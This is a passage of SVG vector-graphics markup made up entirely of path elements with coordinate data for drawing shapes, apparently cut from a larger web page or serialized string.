d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n        <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n        <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n        <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n        <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n        <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n        <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n        <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n        <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n        <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n        <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n        <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n        <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n        <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n        <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n        <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n        <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n        <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n        <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n        <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n        <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n        <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n        <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n        <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n        <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n        <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n        <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n        <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n        <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n        <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n        <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n        <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n        <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n        <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n        <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n        <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n        <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n        <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n        <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n        <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n        <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n        <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n        <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n        <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n        <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n        <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n        <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n        <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n        <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n        <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n        <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n        <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n        <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n        <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n        <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n        <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n        <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n        <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n        <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n        <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n        <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n        <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n        <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n        <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n        <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n        <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n        <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n        <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n        <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n        <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n        <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n        <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n        <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n        <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n        <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n        <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n        <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n        <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n        <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n        <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n        <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n        <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n        <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n        <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n        <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n        <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n        <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n        <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n        <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n        <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n        <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n        <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n        <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n        <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n        <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n        <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n        <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n        <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n        <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n        <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n        <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n        <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n        <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n        <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n        <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n        <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n        <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n        <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n        <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n        <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n        <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n        <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n        <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n        <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n        <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n        <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n        <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n        <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n        <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n        <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n        <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n        <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n        <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n        <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n        <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n        <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n        <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n        <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n        <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n        <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n        <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n        <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n        <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n        <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n        <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n        <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n        <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n        <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n        <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n        <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n        <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n        <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n        <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n        <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n        <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n        <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n        <path 